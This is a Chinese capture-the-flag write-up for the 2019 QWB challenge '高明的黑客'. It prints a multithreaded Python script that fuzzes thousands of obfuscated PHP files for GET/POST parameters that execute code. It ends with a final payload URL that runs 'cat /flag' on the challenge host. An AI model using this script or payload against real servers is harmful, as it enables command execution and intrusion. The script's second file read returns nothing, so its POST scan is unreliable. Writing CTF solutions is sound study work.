[强网杯 2019]高明的黑客

打开靶机,提示网站源码已经备份:

下载源码发现有3002个文件,而且文件内容很乱,大多数都没什么用,看了大佬的WriteUp了解到可以使用脚本跑出可用的执行函数。
大佬的脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import os
import requests
import re
import threading
import time

print('开始时间: ' + time.asctime(time.localtime(time.time())))
s1 = threading.Semaphore(100) # 这儿设置最大的线程数
filePath = r"D:\phpstudy_pro\WWW\JMDHK\src"
os.chdir(filePath) # 改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5 # 设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False # 设置连接活跃状态为False


def get_content(file):
s1.acquire()
print('trying ' + file + ' ' + time.asctime(time.localtime(time.time())))
with open(file, encoding='utf-8') as f: # 打开php文件,提取所有的$_GET和$_POST的参数
gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
data = {} # 所有的$_POST
params = {} # 所有的$_GET
for m in gets:
params[m] = "echo '15h3na0';"
for n in posts:
data[n] = "echo '15h3na0';"
url = 'http://127.0.0.1/JMDHK/src/' + file
req = session.post(url, data=data, params=params) # 一次性请求所有的GET和POST
req.close() # 关闭请求 释放内存
req.encoding = 'utf-8'
content = req.text
# print(content)
if "15h3na0" in content: # 如果发现有可以利用的参数,继续筛选出具体的参数
flag = 0
for a in gets:
req = session.get(url + '?%s=' % a + "echo '15h3na0';")
content = req.text
req.close() # 关闭请求 释放内存
if "15h3na0" in content:
flag = 1
break
if flag != 1:
for b in posts:
req = session.post(url, data={b: "echo '15h3na0';"})
content = req.text
req.close() # 关闭请求 释放内存
if "15h3na0" in content:
break
if flag == 1: # flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
param = a
else:
param = b
print('找到了利用文件: ' + file + " and 找到了利用的参数:%s" % param)
print('结束时间: ' + time.asctime(time.localtime(time.time())))
s1.release()


for i in files: # 加入多线程
t = threading.Thread(target=get_content, args=(i,))
t.start()

多线程跑了几十秒,电脑快炸了,获得可利用文件:

直接cat /flag

最终Payload:

1
http://61250690-f800-4271-92e5-6484b2559f1f.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

参考资料:[强网杯 2019]高明的黑客(考察代码编写能力)